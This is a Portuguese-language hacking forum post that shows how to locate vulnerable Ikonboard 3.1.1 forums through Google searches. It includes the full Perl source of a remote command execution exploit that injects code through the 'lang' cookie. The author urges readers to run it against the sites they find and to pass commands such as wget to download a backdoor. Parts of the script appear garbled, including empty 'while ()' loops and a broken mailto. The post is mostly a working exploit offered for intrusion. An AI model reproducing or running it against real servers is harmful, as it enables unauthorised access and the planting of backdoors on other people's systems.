.:: Explorando a Falha Ikonboard ::.

[Ch1p5]

NUM É NOVA NAO, MAIS MUITA GENTE NAO SABE, ELA É DE 2003, MAIS TEM MUITOS SITES VULNS E TALZ, E É FACIL DE SER EXPLORADA, GALERA DO PDW E TALZ, TA AI, GALERA DO PHPNUKE 7.3 TEM A FALHA DO PHPNUKE 7.4 JA, ESPERO TA AJUDANDO OS NEWS AI, É ISSO AI, VALEWS.

A falha é ikonboard.cgi
Ela ta nesse arkivo ai,
Então pra achar é ir no google e procurar por:
ikonboard.cgi
ou tentar
allinurl:// ikonboard.cgi
pronto
Vai achar um tanto
Vou dar um exemplo
https://www.site.com/cgi-bin/board/ikonboard.cgi
Ai vc Pega o xploit pra ikon
vai no dos e digita
perl xploit.pl www.site.com "id;uname -a;pwd" /cgi-bin/board/ikonboard.cgi
Aonde, perl é pra executar o xploit.pl
o "id;unae -a;pwd" é onde serão executados os comandos,
você pode por entr o "" um comando pra baixar o backdoor,
ou o qui quiser, imagina que seja um "CSE?&cmd=" do php injection
use a criatividade, de echo, wget, ls, ou o que quiser,
e /cgi-bin/board/ikonboard.cgi
é o caminho do ikonboard.cgi naquele site.
espero que tenhao intendido.
email: x_pitter_parker_x@hotmail.com
Irc:
irc.phey.net | /join #h4ck3rsBr
Favor não ripar seus sem criatividade
Recorte o Xploit abaixo, e cole num arquivo .pl e execute com o perl
#!/usr/bin/perl
#
# Date: 5 May 2003
# Author: DeadLine [http://www.q8crackers.us]
#
# Ikonboard 3.1.1 Remote Command Execution PoC
# ============================================
# This bug was found by Nick Cleaton.
#
# For more info and patch, go to:
# http://archives.neohapsis.com/archives/ ... /0027.html
#
# This is a functional version. Use at your own risk.
# Coupled wif the kernel bug, this could be used to root quite
# an impressive number of Linux boxes out there. Enjoy!
#
# Greetz.. my team mates: Marvol .. befcake .. Remsis
# And some new frens: vegas
#
use Socket;
use FileHandle;
if ($ARGV[0] eq '') {
print "Usage: $0 [cmd] [path]\n";
exit;
}
my $port=80;
my $host=$ARGV[0];
my $addr=getaddr($ARGV[0]);
my $cmd=$ARGV[1]?($ARGV[1]):"/bin/uname -a";
my $path=$ARGV[2]?($ARGV[2]):"/cgi-bin/ikonboard.cgi";
my $buff=URLEncode(".\0\" unless(1);"
."print \"Content-type: text/plain\\r\\n\\r\\n\";"
."print \"---BEGIN---\\n\".`$cmd`.\"\\n---END---\";exit;#");
socket(SOCKET,PF_INET,SOCK_STREAM,(getprotobyname('tcp'))[2]);
connect(SOCKET,pack('Sna4x8',AF_INET,$port,$addr,2)) || die "Can't connect: $!\n";
SOCKET->autoflush();
print SOCKET "GET $path HTTP/1.1\r\n";
print SOCKET "Host: $host\r\n";
print SOCKET "Cookie: lang=$buff\r\n";
print SOCKET "Connection: close\r\n\r\n";
print "Ikonboard Exploit, by DeadLine [ mailto:LeaveSky@hotmail.com">LeaveSky@hotmail.com ]\n\n";
while () {
if (/^---BEGIN---/) {
print "> $cmd\n";
while (){
if (/^---END---/) { exit; }
print;
}
}
}
print "$host seems not vulnerable.\n";
exit;
sub getaddr {
my $host=($_[0]);
my $n=$host;
$n=~tr/\.//d;
if ($n=~m/\d+/) {
return pack('C4',split('\.',$host));
}
else {
return (gethostbyname($host))[4];
}
}
# URLEncode routine, courtesy of Glenn Fleishman
sub URLEncode {
my $theURL=$_[0];
$theURL=~ s/([\W])/"%".uc(sprintf("%2.2x",ord($1)))/eg;
return $theURL;
}

--------------------
Fonte: H4ck3rsbr
By pitt3r_p4rk3r